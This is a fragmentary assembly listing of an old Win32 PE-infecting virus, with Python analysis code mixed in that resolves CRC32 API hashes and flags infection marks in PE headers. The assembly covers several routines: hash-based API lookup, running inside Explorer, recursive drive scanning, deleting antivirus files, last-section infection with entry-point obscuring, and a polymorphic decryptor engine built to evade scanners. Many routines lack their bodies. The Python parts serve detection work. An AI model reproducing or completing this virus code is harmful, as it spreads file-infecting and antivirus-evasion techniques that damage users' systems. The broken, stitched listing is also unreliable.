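STD_TABLE = make_crc_table()
SHIFTED_TABLE = make_crc_table(shifted=True)


def crc32_raw(data: bytes, table: list, crc: int = 0) -> int:
    """get_crc32 as written in the listing: register starts at 0, no final XOR."""
    for b in data:
        crc = table[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc & 0xFFFFFFFF


def crc32_cstring(name: str, table: list) -> int:
    """get_str_crc32: the byte count it passes on includes the terminating NUL."""
    return crc32_raw(name.encode("ascii") + b"\x00", table)


def crc32_standard(data: bytes) -> int:
    """Textbook CRC-32 (init 0FFFFFFFFh, final XOR) built from the same table."""
    return crc32_raw(data, STD_TABLE, 0xFFFFFFFF) ^ 0xFFFFFFFF


def matches_zlib(data: bytes) -> bool:
    """zlib.crc32(data, v) returns ~L(~v), so ~zlib.crc32(data, 0xFFFFFFFF) is L(0),
    the zero-initialised, un-inverted variant the listing uses."""
    return crc32_raw(data, STD_TABLE) == (zlib.crc32(data, 0xFFFFFFFF) ^ 0xFFFFFFFF)


def resolve_api_hashes(constants, candidates) -> dict:
    """Map 32-bit constants recovered from a sample back to API names.

    Returns {constant: (name, table_layout)} for every constant that matches
    the CRC of some candidate name under the standard or the shifted table.
    """
    resolved = {}
    for label, table in (("standard", STD_TABLE), ("shifted", SHIFTED_TABLE)):
        lookup = {crc32_cstring(name, table): name for name in candidates}
        for h in constants:
            if h in lookup and h not in resolved:
                resolved[h] = (lookup[h], label)
    return resolved


if __name__ == "__main__":
    # Constructed demo: pretend these constants were pulled from a sample's CRC list.
    sample = [crc32_cstring("GetProcAddress", SHIFTED_TABLE), 0xDEADBEEF]
    print(resolve_api_hashes(sample, ["LoadLibraryA", "GetProcAddress", "CloseHandle"]))
```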
;============================================================================
;Get the entry-point of GetProcAddress
;
;On entry:
; ebx -> KERNEL32 base address
;On exit:
; ecx -> Address of GetProcAddress
;============================================================================
GetGetProcAddr: cld
mov eax,dword ptr [ebx+IMAGE_DOS_HEADER.MZ_lfanew]
mov edx,dword ptr [eax+ \
ebx+ \
NT_OptionalHeader. \
OH_DirectoryEntries. \
DE_Export. \
DD_VirtualAddress]
add edx,ebx
mov esi,dword ptr [edx+ED_AddressOfNames]
add esi,ebx
mov edi,dword ptr [edx+ED_AddressOfNameOrdinals]
add edi,ebx
mov ecx,dword ptr [edx+ED_NumberOfNames]
function_loop: lodsd
push edx
push esi
lea esi,dword ptr [eax+ebx] ;Get ptr to API name
call get_str_crc32 ;Get CRC32 of API name
pop esi
cmp edx,dword ptr [ebp+CrcGetProcAddr]
je API_found
inc edi
inc edi
pop edx
loop function_loop
ret
;============================================================================
;Get the entry-point of each needed API
;
;This routine uses the CRC32 instead of API names
;
;On entry:
; ebx -> Base address of DLL
; ecx -> Number of APIs in the following buffer
; esi -> Buffer filled with the CRC32 of each API name
; edi -> Receives found API addresses
;On exit:
; ecx -> Is 00000000h if everything was ok
;============================================================================
get_APIs: cld
get_each_API: push ecx
push esi
;============================================================
;Get a pointer to the EXPORT data
;============================================================
;============================================================
;Try to find an API name that matches given CRC32
;============================================================
API_Loop: lodsd
push esi ;Ptr to AddressOfNames
lea esi,dword ptr [eax+ebx]
push esi ;Save ptr to API name
call get_str_crc32
mov esi,dword ptr [esp+00000008h]
lodsd
cmp eax,edx
je CRC_API_found
pop eax ;Remove API name from stack
pop esi ;Ptr to RVA for next API name
loop API_Loop
get_API_error: pop esi ;Ptr to CRC's of API names
pop ecx ;Number of API's
ret ;Exit with error (ecx!=NULL)
;============================================================
;The ptr to API name is already on stack, now push the
;module handle and call GetProcAddress
;============================================================
or eax,eax
jz get_API_error;If GetProcAddress returned NULL exit
SEH_Block_0000 macro
add esp,-cPushad
jnz GNtBA_L1
endm
k32_f: popad
xchg ecx,eax
inc eax
GNtBA_L2: @SEH_RemoveFrame
ret
;============================================================================
;VirLoadLib
;
;To use CRC32 instead of API names sounds cool... But there are still some
;strings authors can't get rid of... When calling LoadLibrary the virus must
;specify the DLL name
;
;This routine is the solution to avoid the usage of DLL names
;
;On entry:
; eax -> CRC32 of DLL name
; esi -> CRC32 of API names
; edi -> Where to put API addresses
; ecx -> Number of APIs to find
;On exit:
; eax -> Module handle or NULL on error
;============================================================================
VirLoadLib: push ecx
push esi
push edi
push edi
call parse_filename
lea esi,dword ptr [ebp+DirectFindData+WFD_szFileName]
mov edi,edx
call parse_filename
mov ebx,eax
pop edi
pop esi
pop ecx
call get_APIs
jecxz OkVirLoadLib
push ebx
call dword ptr [ebp+a_FreeLibrary]
xor eax,eax
ret
;============================================================================
;This routine takes a string pointed by esi and copies
;it into a buffer pointed by edi
;
;The result string will be converted to upper-case
;
;On entry:
; esi -> Pointer to source string
; edi -> Pointer to returned string
;
;On exit:
; al -> Null
; edx -> Points to character next to last \
; edi -> Points 1 byte above the null terminator
;============================================================================
;============================================================================
;Copyright notice and disclaimer
;============================================================================
;============================================================================
;Virus initialization ( inside EXPLORER.EXE )
;============================================================================
;============================================================
;Get current local time
;============================================================
;============================================================
;Initialize random number generator seed using current
;year and current month
;============================================================
cld
lodsw
rol eax,10h
lodsw
mov dword ptr [ebp+rnd32_seed],eax
;============================================================
;Locate KERNEL32 code section in memory... This information
;will be used later in the EPO routines
;============================================================
;============================================================
;Sleep for a moment, before start making noise
;============================================================
push 00005000h
call dword ptr [ebp+a_Sleep]
;============================================================
;Load IMAGEHLP.DLL
;
;The ImageHlp functions are supported by the Microsoft
;Windows NT, Windows 95, and Windows 98 operating systems...
;They are used mostly by programming tools, application setup
;utilities, and other programs that need access to the data
;contained in a PE image
;============================================================
;============================================================
;Load SFC.DLL (Windows 2000 only)
;============================================================
;============================================================
;Initialization inside EXPLORER.EXE complete...
;
;Now create a thread to search for files to infect and
;get control back to EXPLORER.EXE
;============================================================
;============================================================
;Free SFC
;============================================================
push eax
call dword ptr [ebp+a_FreeLibrary]
;============================================================
;Free IMAGEHLP
;============================================================
push eax
call dword ptr [ebp+a_FreeLibrary]
ret
;============================================================================
;Virus infection thread, created from inside EXPLORER.EXE process
;============================================================================
InfectionThread:call ThreadDelta
ThreadDelta: pop ebp
sub ebp,offset ThreadDelta
cmp eax,edi
ja ExitIThread
;============================================================
;Follow the drives chain
;============================================================
;============================================================
;Terminate infection thread
;============================================================
push 00000000h
call dword ptr [ebp+a_ExitThread] ;Leave the thread
;============================================================
;Check drive type, only fixed or remote drives allowed
;============================================================
;============================================================
;Got it! Do recursive search on drive
;============================================================
NextDrive: cld
NextDString: lodsb
or al,al
jnz NextDString
jmp DrivesLoop
;============================================================================
;Search for target...
;
;This routine is able to call itself in order to perform a recursive
;search along the entire directory tree
;
;============================================================================
;============================================================
;Store local information on the stack
;============================================================
;Find frame:
;
; Path where to perform search ( size MAX_PATH )
; Return address ( size DWORD )
; FindHandle ( size DWORD )
; Find data ( size SIZEOF_WIN32_FIND_DATA )
;============================================================
;Do FindFirstFile
;============================================================
call parse_filename
dec edi
dec edi
;============================================================
;Find data ready to be checked
;============================================================
;============================================================
;Check for . and ..
;============================================================
cmp ax,002Eh
je DoFindNext
and eax,00FFFFFFh
cmp eax,00002E2Eh
je DoFindNext
;============================================================
;Check if this is a directory
;============================================================
test eax,FILE_ATTRIBUTE_DIRECTORY
jz DoFileFound
;============================================================
;Directory found, perform recursive search on it
;============================================================
push ebx
push edi
call parse_filename
call Search4Files
pop edi
add esp,MAX_PATH
pop ebx
jmp DoFindNext
;============================================================
;File found, check if its a valid host
;============================================================
jnz DoFindNext
;============================================================
;Save file time
;============================================================
cld
lea esi,dword ptr [ebx+WFD_ftCreationTime]
lea edi,dword ptr [ebp+FT_CreationTime]
;============================================================
;Check if file size is allowed
;============================================================
jae DoFindNext
cmp eax,inf_size
jbe DoFindNext
;============================================================
;Save the file size for l8r use
;============================================================
;============================================================
;Check if file is already infected, using size padding
;============================================================
mov ecx,SIZE_PADDING
xor edx,edx
div ecx
or edx,edx
jz DoFindNext
;============================================================
;Get complete path + filename and convert it to upper case
;============================================================
; al -> Null
; edx -> Points to filename at the end of path
; edi -> Points 1byte above the null terminator
;============================================================
;Check file extension
;============================================================
;============================================================
;Extension match... Infect file
;============================================================
call FileInfection
jmp short DoFindNext
;============================================================
;None of our infectable extensions match
;Let's see if this file is an AV-related file...
;============================================================
mov esi,edx
call get_str_crc32
;============================================================
;AV file found... Reset its attributes and delete it
;============================================================
push esi
call dword ptr [ebp+a_DeleteFileA]
;============================================================
;Before looking for more files let's sleep a while
;============================================================
;============================================================
;Find next directory or file
;============================================================
or eax,eax
jnz GoFindRecord
mov esp,ebx
add esp,SIZEOF_WIN32_FIND_DATA + 00000004h
ret
;============================================================================
;Infect PE files
;
;On entry:
; BufStrFilename -> Buffer that contains complete path and
; filename
; DirectFindData -> Win32 Find Data structure filled with
; information about the file to infect
;============================================================================
;****************************************************************************
; mov eax,dword ptr [esi]
; cmp eax,'TAOG'
; jne ExitFileInf
;****************************************************************************
;============================================================
;Avoid some files from being infected
;============================================================
pop esi
jmp ExitFileInf
;============================================================
;Try to infect this file
;============================================================
;============================================================
;Exit file infection
;============================================================
;============================================================================
;Infect file routines
;
;On entry:
; BufStrFilename -> Buffer filled with path + filename
;============================================================================
SEH_Block_0001 macro
add esp,-cPushad
jnz Ape_err
endm
;============================================================
;Open target file for read-only access
;============================================================
;============================================================
;Register ebx contains the base address of the target file
;all along infection routines
;============================================================
mov ebx,eax
;============================================================
;Check for MZ signature at base address
;============================================================
cld
cmp word ptr [ebx],IMAGE_DOS_SIGNATURE
jne inf_close_file
;============================================================
;Check file address of relocation table
;============================================================
;============================================================
;Now go to the pe header and check for the PE signature
;============================================================
add esi,ebx
lodsd
cmp eax,IMAGE_NT_SIGNATURE
jne inf_close_file
;============================================================
;Check machine field in IMAGE_FILE_HEADER
;just allow i386 PE files
;============================================================
;============================================================
;Now check the characteristics, look if file
;is an executable
;============================================================
jz inf_close_file
;============================================================
;Avoid DLLs
;============================================================
;============================================================
;Virus resides on last section
;============================================================
call get_last_sh
jecxz inf_close_file
;============================================================
;Check subsystem, only GUI applications allowed
;============================================================
;============================================================
;Save RVA of last section
;============================================================
mov eax,edi
sub eax,ebx
mov dword ptr [ebp+virus_sh],eax
;============================================================
;This is an attempt to avoid offending PE file formats
;============================================================
;============================================================
;Save a pointer to imports
;============================================================
;============================================================
;Go to relocations
;============================================================
;============================================================
;Relocations section is the last section?
;============================================================
;============================================================
;We can't overwrite relocations...
;...let's attach the virus to the end of the last section
;============================================================
@SEH_SetupFrame <SEH_Block_0001>
xor ecx,ecx
pushad
call DoEPO
mov dword ptr [esp+Pushad_ecx],ecx
Ape_err: popad
@SEH_RemoveFrame
jecxz inf_close_file
mov dword ptr [ebp+inject_offs],ecx
;============================================================
;Close file...
;============================================================
call FileUnmapRO
;============================================================
;...and remap with oversize
;============================================================
call FileMapRW
or eax,eax
jz inf_file_err
;============================================================
;Move virus to file
;============================================================
push edi
mov ecx,inf_size
cld
rep movsb
;============================================================
;Save original code
;============================================================
pop edi
push edi
add edi,org_code-viro_sys
cld
movsb
movsd
;============================================================
;Save some registers on 1st decryptor
;============================================================
mov ecx,00000004h
push ecx
pop ecx
push ecx
pop ecx
pop edi
push edi
add edi,TblDoPolyPops-viro_sys
DoPolyPopsLoop: lodsd
lea edx,dword ptr [ebp+eax+TblDoPop]
mov al,byte ptr [edx]
stosb
loop DoPolyPopsLoop
;============================================================
;Prepare first decryptor mark
;============================================================
;============================================================
;Initialize size of all decryptors
;============================================================
;============================================================
;Get CRC32 of main virus body and save it for l8r use
;============================================================
pop esi
push esi
add esi,CRC_protected-viro_sys
mov ecx,SizeOfProtect
call get_crc32
pop edi
;============================================================
;Generate polymorphic encryption
;============================================================
add edi,inf_size
;============================================================
;Insert a call to virus code over the api call
;============================================================
;============================================================
;Calculate the CALL displacement
;============================================================
call get_code_sh
pop edx
sub eax,edx
pop edi
stosd
;============================================================
;Set read/write access on virus section
;============================================================
;============================================================
;Don't share virus section
;============================================================
;============================================================
;Update SizeOfRawData
;============================================================
;============================================================
;If we changed SizeOfRawData round up to nearest
;file alignment
;============================================================
xor edx,edx
mov ecx,dword ptr [ebp+raw_align]
div ecx
inc eax
mul ecx
mov edx,dword ptr [edi+SH_SizeOfRawData]
mov dword ptr [edi+SH_SizeOfRawData],eax
sub eax,edx
;============================================================
;Update VirtualSize
;============================================================
;============================================================
;Update SizeOfImage
;============================================================
;============================================================
;Find any data directory entry pointing to last section
;============================================================
mov ecx,IMAGE_NUMBEROF_DIRECTORY_ENTRIES
lea edx,dword ptr [esi+OH_DataDirectory]
FDataPtr2Last: mov eax,dword ptr [edx]
cmp eax,dword ptr [edi+SH_VirtualAddress]
jne NextFDataPtr
;============================================================
;Clear BASE RELOCATION field
;============================================================
;============================================================
;Compute new file checksum and update it on PE header
;============================================================
mov edx,eax
lea esi,dword ptr [ebp+ChecksumPE]
push esi ; CheckSum
lodsd
push esi ; HeaderSum
push edx ; FileLength
push ebx
;============================================================
;Mark file as infected and optimize file size
;============================================================
;============================================================
;Close file mapping
;============================================================
;============================================================================
;Scan host code
;
;On entry:
; ebx -> Memory image base address
;Exit:
; ecx -> Inject point offset in file
; or NULL if error
;============================================================================
call get_code_sh
jecxz ExitApe
lodsb
cmp al,0E8h ;Api call generated by Borland Linker?
je try_borland
call get_rnd_range
test eax,01h
jz err_api_call
pop eax
mov ecx,esi
dec ecx
sub ecx,ebx
ret
jmp found_place
;============================================================================
;SEH handling routines coded by Jacky Qwerty / 29A
;============================================================================
SEH_RemoveFrame: push 00000000h
pop edx
pop dword ptr [esp.(02h*Pshd).RetAddr]
pop dword ptr fs:[edx]
pop edx
ret (Pshd)
SEH_SetupFrame: call SEH_Frame
mov eax,[esp.EH_ExceptionRecord]
test byte ptr [eax.ER_ExceptionFlags], \
EH_UNWINDING or EH_EXIT_UNWIND
mov eax,dword ptr [eax.ER_ExceptionCode]
jnz SEH_Search
add eax,-EXCEPTION_ACCESS_VIOLATION
jnz SEH_Search
mov esp,dword ptr [esp.EH_EstablisherFrame]
mov dword ptr fs:[eax],esp
jmp dword ptr [esp.(02h*Pshd).Arg1]
SEH_Search: xor eax,eax
ret
;============================================================================
;FileMapRO open and map a file for read-only access
;
;On entry:
; BufStrFilename -> Buffer filled with path + filename
;Exit:
; eax -> Base address of memory map for file or null if error
;============================================================================
;============================================================
;GetFileAttributes
;============================================================
;============================================================
;CreateFile ( GENERIC_READ )
;============================================================
cmp eax,INVALID_HANDLE_VALUE
je FileGetAttrErr
;============================================================
;CreateFileMapping ( PAGE_READONLY )
;============================================================
jmp FileGetAttrErr
;============================================================
;MapViewOfFile
;============================================================
jmp ErrFileMapRO
;============================================================
;Ready!
;============================================================
;============================================================
;UnmapRO
;============================================================
;============================================================================
;FileMapRW open and map a file for read and write access
;
;On entry:
; BufStrFilename -> Buffer filled with path + filename
;Exit:
; eax -> Base address of memory map for file or null if error
;============================================================================
;============================================================
;Calculate size of infected file
;============================================================
mov ecx,SIZE_PADDING
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp+FatSize],eax
;============================================================
;SetFileAttributes
;============================================================
;============================================================
;CreateFile ( GENERIC_READ or GENERIC_WRITE )
;============================================================
jmp FileSetAttrErr
;============================================================
;CreateFileMapping ( PAGE_READWRITE )
;============================================================
jmp FileOpenErrorRW
;============================================================
;MapViewOfFile
;============================================================
;============================================================
;UnmapRW
;============================================================
;============================================================================
;Convert RVA to RAW
;
;On entry:
; ebx -> Host base address
; edx -> RVA to convert
;On exit:
; ecx -> Pointer to RAW data or NULL if error
; edx -> Section delta offset
; esi -> Pointer to IMAGE_OPTIONAL_HEADER
; edi -> Pointer to section header
;============================================================================
RVA2RAW: cld
mov dword ptr [ebp+search_raw],edx
mov esi,dword ptr [ebx+MZ_lfanew]
add esi,ebx
lodsd
movzx ecx,word ptr [esi+FH_NumberOfSections]
jecxz err_RVA2RAW
movzx edi,word ptr [esi+FH_SizeOfOptionalHeader]
add esi,IMAGE_SIZEOF_FILE_HEADER
add edi,esi
;============================================================
;Get the IMAGE_SECTION_HEADER that contains RVA
;
;At this point:
;
;ebx -> File base address
;esi -> Pointer to IMAGE_OPTIONAL_HEADER
;edi -> Pointer to first section header
;ecx -> Number of sections
;
;Check if address of imports directory is inside this
;section
;============================================================
;============================================================
;Go to next section header
;============================================================
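The host filter (machine, characteristics, DLL and subsystem checks), the header changes the infection routine makes to the last section, and the RVA2RAW conversion above, reimplemented from the analyst's side as an added example (not code from the 29A listing or the virus): it parses PE32 headers, translates an RVA to a file offset, and reports the infection side effects on a constructed sample. The value of SIZE_PADDING, the sample image and the function names are assumptions, since the page does not give them.

```python
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D
IMAGE_NT_SIGNATURE = 0x00004550
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5
SIZE_PADDING = 101  # constructed placeholder: the real constant is not on this page


def parse_pe(data):
    """Walk MZ -> e_lfanew -> PE signature -> IMAGE_FILE_HEADER ->
    IMAGE_OPTIONAL_HEADER (PE32) -> section table, as the listing's
    MZ_lfanew / FH_* / OH_* / SH_* accesses do."""
    if struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if struct.unpack_from("<I", data, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    machine, nsec, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20                                       # IMAGE_OPTIONAL_HEADER
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0"), "vsize": f[1], "va": f[2],
                         "rawsize": f[3], "rawptr": f[4], "flags": f[9]})
    return {"machine": machine, "chars": chars, "subsystem": subsystem,
            "dirs": dirs, "sections": sections}


def rva_to_raw(pe, rva):
    """Same job as the listing's RVA2RAW: file offset of an RVA, or None."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    return None


def matches_host_filter(pe):
    """The listing's host selection: i386, executable, not a DLL, GUI subsystem.
    Files failing any of these are outside this virus's reach."""
    return (pe["machine"] == IMAGE_FILE_MACHINE_I386
            and pe["chars"] & IMAGE_FILE_EXECUTABLE_IMAGE != 0
            and pe["chars"] & IMAGE_FILE_DLL == 0
            and pe["subsystem"] == IMAGE_SUBSYSTEM_WINDOWS_GUI)


def infection_indicators(data):
    """Header side effects the infection routine leaves on a host, by name."""
    pe = parse_pe(data)
    hits = []
    last = pe["sections"][-1]                           # virus lives in the last section
    wx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    if last["flags"] & wx == wx:                        # "Set read/write access on virus section"
        hits.append("last section is writable and executable")
    if len(data) % SIZE_PADDING == 0:                   # the size-padding infection marker
        hits.append("file size is a multiple of SIZE_PADDING")
    reloc = pe["dirs"][IMAGE_DIRECTORY_ENTRY_BASERELOC]
    if reloc == (0, 0) and any(s["name"] == b".reloc" for s in pe["sections"]):
        hits.append("base relocation directory cleared but .reloc section present")
    return hits


def build_sample(last_flags, reloc_dir, total_size):
    """Constructed two-section PE32 (headers plus zero padding); not a real binary."""
    dos = bytearray(0x40)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, 0x40)             # e_lfanew
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)               # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)             # AddressOfEntryPoint
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)     # SectionAlignment, FileAlignment
    struct.pack_into("<H", opt, 68, IMAGE_SUBSYSTEM_WINDOWS_GUI)
    struct.pack_into("<I", opt, 92, 16)                 # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC, *reloc_dir)
    fh = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 2, 0, 0, 0, len(opt),
                     IMAGE_FILE_EXECUTABLE_IMAGE | 0x0100)  # 0x0100 = 32BIT_MACHINE
    secs = struct.pack("<8sIIIIIIHHI", b".text", 0x100, 0x1000, 0x200, 0x400,
                       0, 0, 0, 0, 0x60000020)
    secs += struct.pack("<8sIIIIIIHHI", b".reloc", 0x100, 0x2000, 0x200, 0x600,
                        0, 0, 0, 0, last_flags)
    img = bytes(dos) + b"PE\0\0" + fh + bytes(opt) + secs
    return img + b"\0" * (total_size - len(img))


# Constructed inputs: a clean-looking host and one carrying the header marks above.
CLEAN = build_sample(0x42000040, (0x2000, 0x40), 0x800)
SUSPECT = build_sample(0x42000040 | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE,
                       (0, 0), 21 * SIZE_PADDING)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN), ("suspect", SUSPECT)):
        pe = parse_pe(img)
        print(label, matches_host_filter(pe), hex(rva_to_raw(pe, 0x2010)),
              infection_indicators(img))
```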
;============================================================================
;Get code section header and entry-point information
;
;On entry:
; ebx -> Host base address
;On exit:
; ecx -> Pointer to RAW data or NULL if error
; edx -> Entry-point RVA
; esi -> Pointer to IMAGE_OPTIONAL_HEADER
; edi -> Pointer to section header
;============================================================================
;============================================================================
;Get pointer to last section header
;
;On entry:
; ebx -> Host base address
;On exit:
; esi -> IMAGE_OPTIONAL_HEADER
; edi -> Pointer to last section header
;============================================================================
;============================================================================
;Generate data area suitable for memory write access
;
; edi -> Base address
; ecx -> Size
;============================================================================
gen_data_area: push eax
push edx
mov eax,edi
sub eax,dword ptr [ebp+map_is_here]
add eax,dword ptr [ebp+host_base]
push ecx
pop ecx
mov dword ptr [edx+00000004h],ecx
;============================================================================
;Generate a block of random data
;============================================================================
;============================================================================
;Linear congruent pseudorandom number generator
;============================================================================
;============================================================================
;Perform encryption
;============================================================================
;============================================================
;This buffer will contain the code to "crypt" the virus code
;followed by a RET instruction
;============================================================
;============================================================================
;Generate decryptor action: Load pointer
;
;We don't need to get the delta offset; this virus assumes a fixed load address
;============================================================================
;============================================================================
;Generate decryptor action: Load counter
;============================================================================
;============================================================
;Easy now, just move the counter's random initial value
;into the counter reg and calculate the end value
;============================================================
;============================================================================
;Generate decryptor action: Decrypt
;============================================================================
call fake_or_not
xor eax,eax
mov al,byte ptr [ebp+oper_size]
shr eax,01h
shl eax,02h
add esi,eax
lodsd
add eax,ebp
mov esi,eax
push edi
lea edi,dword ptr [ebp+perform_crypt]
loop_string: lodsb
cmp al,MAGIC_ENDSTR
je end_of_magic
cmp al,MAGIC_ENDKEY
je last_spell
xor ecx,ecx
mov cl,al
rep movsb
jmp short loop_string
last_spell: call copy_key
end_of_magic: mov al,0C3h
stosb
pop edi
ret
;============================================================================
;Copy encryption key into work buffer taking care about operand size
;============================================================================
;============================================================================
;Generate decryptor action: Move index to next step
;============================================================================
;============================================================
;Get number of bytes to inc or dec the index reg
;============================================================
;============================================================
;Get number of bytes to update with this instruction
;============================================================
;============================================================
;Check direction
;============================================================
call do_step_up
jmp short next_update
;============================================================
;Move index_reg up
;============================================================
mov eax,NumIdxUp
call get_rnd_range
lea esi,dword ptr [ebp+tbl_idx_up+eax*04h]
lodsd
add eax,ebp
jmp eax
;============================================================
;Move index_reg down
;============================================================
mov eax,NumIdxDown
call get_rnd_range
lea esi,dword ptr [ebp+tbl_idx_down+eax*04h]
lodsd
add eax,ebp
jmp eax
;============================================================================
;Generate decryptor action: Next counter value
;============================================================================
;============================================================
;Check counter direction and update counter
;using a INC or DEC instruction
;============================================================
mov al,40h
jmp DoShitWithCtr
mov al,48h
jmp DoShitWithCtr
call get_valid_reg
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
mov ah,byte ptr [ebx+REG_MASK]
shl ah,03h
or ah,byte ptr [ebp+counter_mask]
or ah,0C0h
mov al,8Bh
stosw
push ebx
call GenGarbageEx
pop ebx
pop eax
or al,byte ptr [ebx+REG_MASK]
stosb
push ebx
call GenGarbageEx
pop ebx
mov ah,byte ptr [ebp+counter_mask]
shl ah,03h
or ah,byte ptr [ebx+REG_MASK]
or ah,0C0h
mov al,8Bh
stosw
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
ret
;============================================================================
;Generate decryptor action: Loop
;============================================================================
;============================================================
;Use counter reg in CMP instruction?
;============================================================
;============================================================
;Generate CMP counter_reg,end_value
;============================================================
mov ax,0F881h
or ah,byte ptr [ebp+counter_mask]
stosw
mov eax,dword ptr [ebp+end_value]
stosd
jmp doloopready
;============================================================
;Get a random valid register to use in a CMP instruction
;============================================================
;============================================================
;Move index reg value into aux reg
;============================================================
;============================================================
;Guess what!?
;============================================================
push ebx
call GenGarbageEx
pop ebx
call get_rnd32
and al,03h
or al,al
jz loop_use_cmp
test al,02h
jz loop_use_sub
;============================================================
;Generate ADD aux_reg,-end_value
;============================================================
loop_use_add: mov ax,0C081h
or ah,byte ptr [ebx+REG_MASK]
stosw
mov eax,dword ptr [ebp+end_value]
neg eax
stosd
jmp short done_loop_use
;============================================================
;Generate CMP aux_reg,end_value
;============================================================
;============================================================
;Generate SUB aux_reg,end_value
;============================================================
;============================================================
;Restore aux reg state
;============================================================
;============================================================
;Generate conditional jump
;============================================================
TblExitLoop equ $
dd offset doloopup
dd offset doloopdown
dd offset doloopmix
;============================================================
;Generate the following structure:
;
; loop_point:
; ...
; jnz loop_point
; ...
; jmp decrypted-code
;============================================================
;============================================================
;...or this one:
;
; loop_point:
; ...
; jz decrypted-code
; ...
; jmp loop_point
; ...
;============================================================
sub eax,edi
sub eax,00000004h
stosd
call GenGarbageEx
;============================================================
;Generate the following structure:
;
; loop_point:
; ...
; jnz auxdest
; ...
; jmp decrypted-code
; ...
; auxdest:
; ...
; jmp loop_point
;============================================================
;============================================================
;I noticed some AV was using the JZ/JNZ instruction at the
;end of the decryptor in a search pattern... So now I'm going
;to build it at runtime (sometimes...)
;============================================================
mov eax,NumFog
call get_rnd_range
lea esi,dword ptr [ebp+TblDoFog+eax*04h]
lodsd
add eax,ebp
call eax
mov eax,NumFixFog
call get_rnd_range
lea esi,dword ptr [ebp+TblFixFog+eax*04h]
lodsd
mov esi,dword ptr [ebp+condition_ptr]
add eax,ebp
call eax
NoFogRet: ret
;============================================================================
;Prepare pointer to memory into fog block, using ADD
;============================================================================
;============================================================================
;Prepare pointer to memory into fog block, using SUB
;============================================================================
DoFogSub: call FogStart
neg eax
add eax,dword ptr [ebp+Xrnd1]
push edi
push eax
mov ebx,dword ptr [ebp+XrndReg]
mov edi,dword ptr [ebp+XrndFixPtr]
mov ax,0E881h
or ah,byte ptr [ebx+REG_MASK]
stosw
pop eax
stosd
pop edi
ret
;============================================================================
;Prepare pointer to memory into fog block, using XOR
;============================================================================
;============================================================================
;Setup fog block
;============================================================================
;============================================================================
;Convert a given value in the poly decryptor to its future RVA
;
;On entry:
; eax -> Value to convert
;On exit:
; eax -> Converted value
;============================================================================
;============================================================================
;Produce complex end determination
;
;On entry:
; esi -> PtrToEP or loop_point
;============================================================================
;============================================================
;Go using JMP imm
;============================================================
;============================================================
;Go using complex scheme
;============================================================
call get_valid_reg
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
mov al,0B8h
or al,byte ptr [ebx+REG_MASK]
stosb
call get_rnd32
stosd
push eax
push ebx
call GenGarbageEx
mov eax,NumJmpEnd
call get_rnd_range
lea esi,dword ptr [ebp+tbl_jmp_end+eax*04h]
lodsd
add eax,ebp
pop ebx
pop edx
pop esi
call eax
push ebx
call GenGarbageEx
pop ebx
call get_rnd32
and al,01h
jz EndUseJmpReg
;============================================================================
;Complex end using ADD
;============================================================================
;============================================================================
;Complex end using SUB
;============================================================================
;============================================================================
;Complex end using XOR
;============================================================================
;============================================================================
;Complex fixed address
;============================================================================
;============================================================================
;Generate init garbage
;============================================================================
mov ecx,eax
loop_g_i_g: push ecx
mov eax,(end_i_g-tbl_i_g)/04h
call get_rnd_range
pop ecx
loop loop_g_i_g
ExitInitGarbage: ret
;============================================================================
;Generate some garbage code
;============================================================================
call get_rnd_range
inc eax
inc eax
mov ecx,eax
loop_garbage: push ecx
mov eax,(end_garbage-tbl_garbage)/04h
mov eax,(save_space-tbl_garbage)/04h
ok_gen_num: call get_rnd_range
lea esi,dword ptr [ebp+tbl_garbage+eax*04h]
lodsd
add eax,ebp
call eax
too_much_shit: pop ecx
loop loop_garbage
;============================================================
;Update recursive level
;============================================================
;============================================================================
;Generate MOV reg,imm
;============================================================================
;============================================================
;Generate MOV reg32,imm
;============================================================
;============================================================
;Generate MOV reg16,imm
;============================================================
;============================================================
;Generate MOV reg8,imm
;============================================================
;============================================================================
;Generate xchg reg,reg
;============================================================================
;============================================================================
;Generate MOVZX/MOVSX reg32,reg16
;============================================================================
;============================================================================
;Generate INC reg
;============================================================================
;============================================================================
;Generate DEC reg
;============================================================================
;============================================================================
;Generate ADD/SUB/XOR/OR/AND reg,imm
;============================================================================
;============================================================================
;Generate decryption instructions (real or fake ones)
;============================================================================
;============================================================
